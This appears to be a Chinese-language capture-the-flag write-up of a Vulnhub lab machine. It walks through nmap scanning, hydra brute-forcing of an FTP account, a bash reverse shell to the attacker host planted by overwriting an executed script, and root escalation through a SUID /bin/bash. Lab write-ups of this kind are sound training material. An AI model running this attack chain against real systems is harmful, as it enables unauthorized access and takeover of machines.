前言

 由于在做靶机的时候，涉及到的渗透思路是非常的广泛，所以在写文章的时候都是挑重点来写，尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主
 如果不会导入Vulnhub靶机和配置网络环境的话，请点我直达发车文章！

 👉本文靶机下载连接-戳我直接下载！👈

1、靶机ip配置

• Kali IP：192.168.2.4
• 靶机IP：192.168.2.7靶机ip获取方式如下图
  

2、渗透目标

• 获取到/root/目录下的flag文件

3、渗透概括

1. ftp信息获取
2. ftp服务爆破
3. 通过ftp建立反弹shell
4. /bin/bash的suid提权

开始实战

一、信息获取

使用nmap工具对靶机做基本的信息收集nmap -sS -sV -A -T4 -p- 靶机IP如下所示

可以看到，开放的几个端口分别是21/ftp 22/ssh 80/http 3306/mysql
21/ftp从扫描结果可以看到可以使用ftp的匿名用户anonymous登录，并且有一个welcome.msg的文件
22/sshssh可以直接pass掉了，这个版本基本上没有什么可利用的漏洞了，一般获取到了用户信息或者爆破才使用这个
80/http基本上大部分的漏洞都是存在于web服务上
3306/mysql是Mysql服务，后续如果获取到了一些用户信息可以用来爆破或者写马之类的

我们先看看21/ftp上的文件
我们通过如下方式下载welcome.msg文件

看看文件内容，如下图

发现了一个有意思的东西，这个文件内的内容其实就是在登录ftp时显示的消息，如下所示
发现了一个关键的信息，那就是有一个邮箱sky@funbox9其中sky可能是一个用户名

二、爆破FTP服务

我使用如下命令对ftp服务的sky用户进行爆破

hydra -l sky -P /usr/share/wordlists/rockyou.txt -t 32 192.168.2.7 ftp

如下所示，sky用户的密码是thebest

我们使用获得的账户密码登录该靶机的ftp服务
如下所示，登录成功之后该用户的目录下有一个user.flag的文件，我们使用get命令将其下载

我们看看下载好的user.flag文件
如下所示，这段内容是sh脚本文件，貌似会被执行，那么这里就有操作的空间了

三、GetShell

我们编辑下载下来的user.flag文件，改为如下内容(反弹shell)

#!/bin/sh
/bin/bash -i >& /dev/tcp/192.168.2.4/1234 0>&1

我们再次登录ftp服务，将编辑完之后的user.flag文件上传

使用nc -lvvp 1234监听一下反弹shell

然后再次登录ftp随便输入个账户即可

如下所示，我们的nc即可监听到反弹过来的shell
使用whoami命令发现当前是sarah用户
我们再使用python3 -c 'import pty;pty.spawn("/bin/bash")'命令升级一下shell

四、提权

使用sudo -l发现需要密码，我们并不知道密码，就先放弃

我们使用如下命令找找具有suid权限的命令

find / -perm -u=s -exec ls -al {} \; 2>/dev/null

结果如下所示/bin/bash具有suid权限，那么我们就可以利用这个提权

如下所示，我们使用/bin/bash即可成功提权到root

如下所示，我们切换到/root目录
获取flag文件root.flag即完成该靶机的渗透